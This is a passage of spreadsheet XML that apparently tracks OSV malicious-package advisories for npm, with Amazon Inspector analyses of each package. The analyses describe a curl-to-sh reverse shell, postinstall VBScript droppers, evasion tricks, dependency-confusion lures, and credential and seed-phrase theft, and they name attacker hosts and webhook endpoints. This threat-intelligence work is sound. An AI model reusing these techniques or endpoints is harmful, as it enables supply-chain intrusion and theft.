      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-roof</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (25cbf03ad6014824ab078237f83b2b682145928e5effefbe3dcc5deca9ba1e26)
The package presents itself as the pino logger — README, docs/, index.d.ts and LICENSE are copied from pinojs/pino and keywords advertise 'fast, logger, stream, json' — but the package name is 'hardhat-roof', the description references unrelated vulnerability-management functionality, and the author points to jsonspack.com rather than the pino maintainers. The top of index.js executes `require('./lib/config')`, which loads lib/config.js: a 4,373,384-byte file containing obfuscator.io-style string-array obfuscation with a self-rotating decoder (`n['push'](n['shift']())` loop gated by a parseInt sum), hex-escaped character lookups, and dozens of single-letter indirection functions. The remaining lib/ files are small and consistent with pino; only config.js is the oversized opaque blob, and the real pino has no such file. Any consumer that imports or requires this package therefore executes several megabytes of opaque code in-process at load time. The combination of a doppelganger cover story cloned from a popular logger, a mismatched package name and author, and a reachable load-time execution path into a heavily obfuscated multi-megabyte payload is the shape of a trojanized typosquat/doppelganger delivering attacker-controlled code into installer processes.
</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17509</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17510</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="inlineStr"/>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>npm:internallib_v275</t>
        </is>
      </c>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (80c1c6d383b3defb01da235e39e08ce56276d887e63d900aea2ee689836f71b4)
index.js exports a `command` function that invokes `/bin/bash -c` to curl a reverse-shell payload from reverse-shell.sh targeting the hardcoded host 10.0.49.106:443 and pipes the response to `sh`, yielding interactive remote shell access on the installer host whenever the exported API is called. The fetch-and-execute path has no pinning, no hash verification, and runs over an unauthenticated network retrieval. package.json also declares a self-referential dependency on `internallib_v275@^1.0.0`, a dependency-confusion shape consistent with a package targeting an internal registry namespace so that resolution against the public registry pulls this backdoor into internal builds.
</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17510</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17511</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="inlineStr"/>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>npm:lite-mater</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr"/>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (532663c4102d3cf7310e29ca1eb2b389c5c32c1e541da219b7c4364968f4e807)
package.json declares a postinstall lifecycle hook `wscript.exe 4444.vbs` that runs automatically on `npm install` on Windows hosts. The shipped 4444.vbs (~765 KB) is a multi-layer obfuscated loader: an embedded payload is stored as a large ArtifactBundleHX[] string array, Base64-decoded via MSXML DOM into a byte buffer, then decrypted through a custom XOR routine, an AES forward S-box, and a ChaCha20-IETF stream layer. The reconstructed payload is written to %TEMP%\pfNNNNN.dat and handed to powershell.exe via a two-tier loader whose in-source comments reference PowerShell process hollowing. Identifier and comment strings (`Device Telemetry Aggregator`, `Verdant Signals Corp`) act as a cover story, and the README explicitly claims the package has `No installation scripts` — directly contradicting the postinstall hook. The package ships no library code or legitimate functionality consistent with its stated purpose; its only install-time effect is to detonate the obfuscated Windows loader on the installer's machine.
</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17511</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17512</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="inlineStr"/>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>npm:lite-matte</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr"/>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4e7b0ae9e42c334c1c22627e60add7a2c5a0d558a2ab65a3af0043e27bb0e686)
package.json declares `"postinstall": "wscript.exe 4444.vbs"`, causing `npm install` to auto-execute a ~765KB Windows Script Host file shipped in the tarball. 4444.vbs is heavily obfuscated: it reconstructs COM ProgIDs (ADODB.Stream, MSXML2.XMLHTTP) at runtime via a Chr/XOR helper, uses XOR-masked hex tables for AES S-boxes and SHA-256 round constants, and stores its real payload as ~700 Base64-shaped chunks in an `ArtifactBundleHX` array decrypted through AES-256-CBC followed by ChaCha20-IETF. The decrypted PowerShell loader is written to `%TEMP%` and handed off to powershell.exe with comments indicating process hollowing. The declared package purpose (a trivial 60-line zod-based email domain checker at src/index.js) is unrelated to the dropper, and the README explicitly states 'No installation scripts. No network requests.' while the manifest ships exactly that. Header cover story labels the script 'Verdant Signals Corp. Device Telemetry Aggregator'.
</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17512</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17513</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>npm:lite-matterr</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr"/>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cc9b5f5edaae9103fd26de7cb70e661d78d6948dc3c519fec6b4b62fd471fbfc)
lite-matterr@1.0.0 declares a postinstall hook in package.json that runs `wscript.exe 4444.vbs` on `npm install`. The bundled 4444.vbs is a ~765KB heavily obfuscated VBScript containing layered decryption routines (XOR-masked AES S-boxes, a ChaCha20 stream layer, SHA-256 round constants XORed with 0x5A5A5A5A) and a ~600-entry base64 bundle that it concatenates and decrypts into a PowerShell loader. The decrypted loader is written to %TEMP%\pf&lt;rand&gt;.dat and executed via powershell.exe, with internal comments referencing process hollowing. The README falsely claims 'No network requests. No personal data storage. No installation scripts.', directly contradicting the declared postinstall. The package presents a 'Device Telemetry Aggregator' cover story while actually delivering a multi-stage Windows dropper that achieves code execution on any host that installs the package.
</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17513</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17514</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>npm:minimal-a11y-contrast-check</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr"/>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d9a198e6fb2c5e31bc841ff12f210e630abe8629853faf4ea961a124a9be8a25)
Despite being advertised as a WCAG contrast checker, the package executes a self-invoking function at module load that runs host reconnaissance commands (whoami, id, hostname, uname -a, ls -la /, pwd, cat /etc/os-release) and collects filtered environment variables, then exfiltrates the results via DNS subdomain requests to davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live and HTTP GET parameters to webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The exfiltration fires on any import of the package. Additionally, the module exports factories named after Wix Thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry) and ships a registry-manifest.min.json pointing at static.parastorage.com/unpkg/minimal-a11y-contrast-check@1.0.0, impersonating internal Wix build infrastructure to be resolved via dependency confusion. A hardcoded 'internetbrands' tag embedded in the exfiltration payload indicates targeted reconnaissance.
</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17514</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17515</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="inlineStr"/>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>npm:monitoring-agent</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr"/>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (703c1e796904571c9f0d08a4769a5f7e25a646483b4a66815a6ddc420ae0ecee)
The package exports an Express middleware (`monitor()`) advertised as a monitoring tool. On every response finish, the middleware POSTs the inbound HTTP request to a hardcoded author-controlled host at https://backend-cybersecuritydashboard.onrender.com/api/events. The payload explicitly extracts `req.body.password`, `req.body.username`, and `req.body.email` as dedicated fields alongside the full request headers, body, query string, and route params. The destination URL is not configurable by the caller — the only caller-supplied value is an apiKey. Any Express application that mounts this middleware will silently forward its end users' plaintext credentials and complete request payloads to this third-party Render host on every request. The package.json uses placeholder author metadata (`Your Name`) with no repository or homepage, and the exfiltration destination is unrelated to any disclosed publisher.
</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17515</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17516</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="inlineStr"/>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:oleh-modal</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr"/>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cf2aebc282014a7dfa6ef1726083d23bcc9cc3eca76c814d4e775b7b10021545)
Package oleh-modal@1.0.0 is a credential-harvesting phishing kit disguised as a wallet-connect modal component. It renders fake MetaMask/Phantom/Rabby/OKX 'restore vault' modals that link to the legitimate extensions' restore-vault URLs to reinforce the deception, then captures the user's typed seed phrase / password characters via sendKeyToBackendAPI and POSTs them to a hardcoded backend at https://api.wagmiwallet.org/api/keys along with wallet_type, user_id, and enriched geolocation metadata (IP via api.ipify.org, city/region/country via ipapi.co). A persistent WebSocket connection to wss://api.wagmiwallet.org subscribes to a 'showMacModal' event that lets a remote operator trigger a spoofed macOS admin-authentication prompt on demand in the host application; captured mac_user_name and keystrokes from that dialog are forwarded through the same exfiltration path. Configuration references serverUrl 'https://wagmirequest.la' and backendUrl 'https://api.wagmiwallet.org', typosquats of wagmi.sh. Any consumer application that renders this component will forward its end users' wallet mnemonics and OS credentials to the attacker endpoint.
</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17516</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17517</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="inlineStr"/>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>npm:popover-anchor-polyfill</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr"/>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (31e270ae326e5c45ebeb5fcf7bc9ff96126908c194bef5f280a4028fff0e9ed9)
The package advertises itself as a 'popover anchor positioning polyfill' but ships thunderboltRegistry.js, which executes an IIFE on module load that spawns shell commands via child_process.execSync (`id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`) and reads `/etc/hosts`, then transmits each command's output together with hostname, Node version, platform, and pid over plain HTTP GET requests to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The require path uses cache-bypass tricks (deleting require.cache entries matching 'thunderboltRegistry' and manually constructing a fresh Module to re-resolve child_process) to defeat mocking or interception. Sibling stub files and a `registry-manifest.min.json` impersonate Wix thunderbolt internal registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) and reference static.parastorage.com, indicating a dependency-confusion lure targeting Wix build pipelines. The declared polyfill purpose does not match the shipped Wix-internal namespace exports, and no popover-polyfill functionality is implemented.
</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17517</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17518</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>npm:postcss-gap-fallback-util</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr"/>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5b54d5bd893bc377a77503059998e01ae3e338fd4d8ddac6fe2d7c71a3157cb5)
The package is published as a PostCSS gap fallback utility but ships thunderboltRegistry.js, which executes an IIFE on module load. The IIFE runs whoami, id, and hostname via child_process.execSync, curls the AWS instance metadata service at http://169.254.169.254/latest/meta-data/ for IAM role, instance-id, availability zone, and local IPv4, and sends the results to https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba along with DNS beacons to a host under oast.live. A registry-manifest.min.json maps multiple Wix-internal registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry) to the same exfiltration file, and the module exports a Proxy returning no-op registry methods as a façade. The naming, manifest, and façade indicate a dependency-confusion payload targeting Wix build infrastructure; on any installer that requires one of the impersonated module names, shell identity, hostname, and (on EC2) AWS IAM role credentials/metadata are leaked to an attacker-controlled webhook and DNS collector.
</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17518</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17519</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="inlineStr"/>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>npm:promises-dotenv3</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr"/>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (146d9688d00e8fa785e2fb62976f0dad169e8055c6c92d3795536cc63527c640)
promises-dotenv3@1.0.0 is a typosquat of dotenv-family packages that executes an obfuscated payload at module load. On top-level require of the package's main entry and its CLI, a function named `dispatchAnalytics` reads a payload hidden in an APP13 JFIF segment of a bundled image (dist/stest.jpg), writes a randomly-named VBS file (relay_*.vbs) to the OS temp directory, and spawns wscript.exe (detached) to invoke powershell.exe with -NoProfile -NonInteractive -EncodedCommand and the extracted content; the VBS self-deletes after launch. The interpreter names and PowerShell switches are assembled from joined string fragments ("power"+"shell"+".exe", "wscript"+".exe", split -No/Profile, -Non/Interactive, -Encoded/Command) to evade static string matching. The bundled package.json inside dist/cli.cjs identifies itself as `node-env-buffer` v2.2.6, indicating the same payload is being published under multiple dotenv-adjacent names. Installing or requiring this package runs attacker-controlled PowerShell on the installer's Windows host.
</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17519</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17520</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>npm:rgx33-css-grid-utils</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr"/>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (320488b79c9000782e398425aa1a2fddba7f29a487913bbb2fc2019405c078f5)
The package is published as `rgx33-css-grid-utils` but exports a set of module keys matching Wix thunderbolt internal registries (`thunderboltRegistry`, `siteAssetsRegistry`, `editorRegistry`, `corvidRegistry`, `dataBindingRegistry`, `documentManagementRegistry`, and others) — a dependency-confusion lure targeting Wix's internal build/runtime namespace. On module load, an IIFE collects host identifiers (hostname, pid, Node version, platform) and runs `child_process.execSync('id')` and `child_process.execSync('uname -r')` to capture the current user and kernel version. These values are encoded as DNS subdomain labels and sent via `fetch` to the interactsh/OOB collector `davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live`, and in parallel to `https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba` with a `where=wix-blog` query parameter identifying the campaign target. The package ships no CSS grid functionality consistent with its name; the reconnaissance beacon is the entire payload.
</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17520</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17521</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>npm:rgx33-flex-layout-core</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr"/>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02200327d66cf0661b787f58049b55b5fbb95dfb76fbb81a679cc71439bd85eb)
